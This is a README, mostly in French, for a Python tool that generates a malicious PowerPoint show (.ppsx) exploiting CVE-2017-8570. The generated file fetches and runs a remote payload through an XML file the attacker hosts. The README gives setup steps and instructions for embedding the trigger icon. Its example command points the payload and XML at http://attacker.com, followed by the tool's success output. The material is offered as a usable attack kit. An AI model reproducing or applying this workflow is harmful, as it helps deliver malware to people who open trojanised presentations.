
générateur de fichier ppsx pour cve-2017-8570 (basé sur bhdresh/cve-2017-8570)
Par Temesgen Yibeltal [email protected] (Basé sur le code de https://github.com/bhdresh/CVE-2017-8570 (maintenant supprimé))
ppsx-file-generator est un outil Python qui génère un fichier de diaporama PowerPoint qui exécute du code depuis une source distante à partir d'un fichier existant.
L'outil génère un fichier de diaporama PowerPoint et un fichier XML à partir des entrées fournies. Le fichier PowerPoint accède au fichier XML qui contient les informations du fichier de charge utile. Un attaquant peut servir le fichier XML et la charge utile sur un serveur local ou public et fournir l'URL de chacun comme entrée.
Tout d'abord, récupérez le code :
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator est écrit en Python et nécessite zipfile, qui peut être installé via Pip :
pip install zipfile
Nécessite Microsoft Office Power Point pour effectuer cette tâche.
Ouvrez d'abord Microsoft Office Power Point et ouvrez 'template.ppsx'. Ouvrez votre propre fichier de présentation et copiez l'icône 'Coder.exe' depuis template.ppsx vers la diapositive 1 de votre fichier PowerPoint. Enregistrez le fichier sous le format Power Point Show (.ppsx). Utilisez ensuite l'outil Python comme suit :
Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename The input ppsx file name.
-o Output .ppsx file name, (inlcude the .ppsx).
-p The payload exe or sct file url.
It must be in an accessible web server. (Optional for xml file)
-x The full xml uri to be called by the ppsx file.
It must be in an accessible web server.(Required)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully